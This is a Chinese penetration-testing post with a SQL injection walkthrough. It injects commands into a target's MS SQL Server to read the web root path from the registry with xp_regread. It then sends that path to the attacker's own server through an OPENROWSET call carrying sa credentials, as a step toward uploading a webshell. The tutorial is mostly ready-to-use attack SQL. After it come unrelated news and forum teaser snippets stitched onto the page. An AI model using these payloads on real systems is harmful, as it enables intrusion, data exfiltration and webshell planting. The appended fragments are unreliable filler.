渗透中用openrowset搞shell的 ***
得到SQL注入点,首先想到的是BACKUPWEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
首先在自己机器建立SQL数据库
然后在对方机器上建立个表createtable[dbo].[fenggou]([cha8][char](255))--
在对方执行DECLARE@resultvarchar(255)execmaster.dbo.xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\VirtualRoots','/',@resultoutputinsertintofenggou(cha8)values('selecta.*FROMOPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'',''select*FROMpubs.dbo.authorswhereau_fname='''''+@result+''''''')ASa');--
这样fenggou这个表里就会有这样一条记录selecta.*FROMOPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码','select*FROMpubs.dbo.authorswhereau_fname=''D:\WEB,,1''')ASa
不用说,''D:\WEB就是从注册表里读出的物理路径拉.然后执行DECLARE@a1char(255)set@a1=(selectcha8FROMfenggou)exec(@a1);--
等于执行了selecta.*FROMOPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码','select*FROMpubs.dbo.authorswhereau_fname=''D:\WEB,,1''')ASa
OK,这时你在你机器上SQL事件追踪器上就会显示select*FROMpubs.dbo.authorswhereau_fname='D:\WEB,,1'
哇哈哈哈哈哈物理路径到手了写小马传大马吧~
1.同类型平台收益高 有时候同类型平台会有较大的收入差距 ,可能是因为各种目的,比如运营不佳,但急于达到预期目标 ,或者新平台与旧平台相比,老用户基数较小,竞争压力较大。开展大型活动时 ,平台可...
本文导读目录: 1、男主很天才的 IT 黑客方面的漫画 注意是漫画漫画 不是动漫 2、这是什么动漫??? 3、求一部动漫 主角是网络黑客 加入了警察 是网络里的机战动漫 4、这张图片来自哪...
本文导读目录: 1、什么是黑客? 2、什么是黑客?黑客为什么要入侵我们的电脑?恶意代码是什么? 3、黑客到底是什么? 4、红客,骇客,黑客他们具体有什么不同? 5、黑客是什么,能做什么...
北京时间11月18日晚间消息,知情人士透露,美国联邦调查局(以下简称“FBI”)的调查结果显示,发生于去年的纳斯达克网络攻击事件主要是因为纳斯达克的网络安全措施松懈所致。 目前FBI的调查仍在进...
本文导读目录: 1、赛博朋克2077斯安威斯坦是什么? 2、游戏赛博朋克2077里面智力天赋有什么? 3、在《赛博朋克 2077》里主要讲述的是什么故事?主要有哪些角色登场? 4、赛博朋克...
原标题:女子网络博彩输掉20万元 又花7.9万元找黑客想追回损失 今天,上游新闻记者从江津区公安局获悉,当地警方日前破获一起网络诈骗案,跨省追回被骗款7.9万元。 8月8日,江津区吴女士来...